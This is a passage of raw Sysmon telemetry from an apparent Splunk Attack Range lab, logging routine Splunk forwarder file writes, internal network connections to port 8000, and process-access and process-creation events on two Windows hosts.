Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2F339294D100CE6DB364C701CC1331AD,SHA256=DE1714E9BDCE6B1C53AC26D0A699AB0B32998E1A19A7C8FE7045452F8B0DEBDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A75462C3309FAB3E635DFDDE4370BB5,SHA256=76F92421945549A2C63A5A2114A9BD1C87B8929D410F78F92CAFC1C085866F35,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:40.283{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B07ABC750B5CB152BE6CB0B4CB71FC,SHA256=B52153426A35A2230E244ECD0331FDC1C9A6B3A754676CCC8FAEAEC545200D88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:40.346{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76217B0BBC4EC71567886BF4770BB9E1,SHA256=0EF28A1492A6C39580B079AF5DEF380C9CB4DE48A8951A746DDDC8E2E395F70B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.645{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51002-false10.0.1.12-8000- 23542300x80000000000000001048037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:41.361{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9CB36DC6DA67327B090B520C50AD2EF,SHA256=DECBE67BEB0D5C03EE7C7D766292C4195913FCF5D646B93F94F36A42D568DA63,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000807289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:40.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57243-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:41.299{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6968F68406D7D1128C5C09D4782E33,SHA256=30DE45ADC72138EEA9EDAE3BA09A7C8AA98159A2873AD92B12F7CD3E0FC2C62A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:42.362{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDA0782E2843B07D941FA512C80CB201,SHA256=912308A9AEA9BC0F07A974229338DDBE2E7F83914EE8F3AEE5518424118A3DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:42.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D835DD8A8BE765F2C4478E919A98579,SHA256=8A84653B0FF5F4024D8BEBF5321C1A50DC95C63002A4C9949BBC26536FAF33B7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:43.346{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607605943DAC1332BF89B00DEC7638C2,SHA256=4F12401938A1F55714B796832B2BFCF4AE9E46D00749F63E713CBB6E292A9CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:43.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BA6601D4D2D28BE4F2582870132AB1A,SHA256=8AEFACD1400E55C5F48CD1B475DE6851CE766970161355B87D7D4247F0BD3AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:44.377{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB3B0266F603FACC6B2D085EE996094,SHA256=5E172C837045661FA76F9FBFE48D94EEEFB2A834F5DADB4694FBC0E7F9455F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:44.428{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=084D469E28FA57F3013CFC7C8BCC1CE4,SHA256=E1077DC1343EE9F6ACED6B369359AE4D22245C29146E8B8FAFAE876E4B1E55A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:45.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1CA50E1F5B7CE6AC1E12B51D8195A8F,SHA256=62D053B53C8CFEDD43028C981E65DBBD81EA01A8EEE434E3C36D6582385612B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:45.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32F1B9AB64B6E9FD94A07392064184E8,SHA256=2169E37BB52C99E3D6B85A9F89C55F0A867DB590149986069EC8D6D714362849,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51003-false10.0.1.12-8000- 23542300x80000000000000001048043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:46.476{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DAA374986BE2F7703C77A6D45C2B40,SHA256=7B22C4DB6D67F143E136DFAF36D2F6EF4DF8866740DC03A4D01612ACAAD7023B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:45.292{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57244-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:46.390{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6921172D00D295711BE7273FD5772480,SHA256=E95422BFEBECB08B8A3E3629348E21DB2D131DE04108110D74E159F7FE8260F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:47.494{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4571F3312B00D45417BAFCED3837E9AA,SHA256=076F41011855B517CF737EF7562AF0EF62CEA1D4586E2DCC5C24AD32E146907D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:47.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32F1B7C61BCF92303D1290D3D38C4676,SHA256=B877DD3257EF1EF9F4383CF18C8A38B3DE2E211F93FF2FB86EBBA7637337B733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:48.439{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=562D28F5DFC06DE63FD1E4BEE448DC00,SHA256=058E1BFB1DC946A95689D188C7BFC021A18BBAE26A0EC11EC46374EB55A03F5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:48.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970CFF58DE48BAF1A2CA8BA023B5C1B5,SHA256=90F4FAEFE143C40F3D41DF90D87B710D4E64962B93A9DE722DA8CCE7F44E9AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:49.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513A8A4663240CFB72FBF7C3FCDF37BC,SHA256=BC579085EE8B7863194599CE8D03BC4D908200BC9AE3F61464969AE8F27FE520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:49.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13E665FDA7E4374621C6EFDD4078866,SHA256=BF042173F3CB6D509164C8E98B4B2F161E4229408057BCC91D98BABE5345CC60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:50.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=092CF3B9831CA29D3F7054ACDD00D225,SHA256=5B965EED40B9D89224F5A52A018EA391141CD4A61100EC33DC77AEA39E1A4B61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.923{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:50.923{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.908{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAC17359E3EEAF8C457E1866E576D98,SHA256=2DEBA01571B672D4BF39EC6D1A9E101AF24DF8D7793321EF355B4247BE107274,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.454{466BC892-F45A-60EB-1C7D-00000000CF01}9286692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
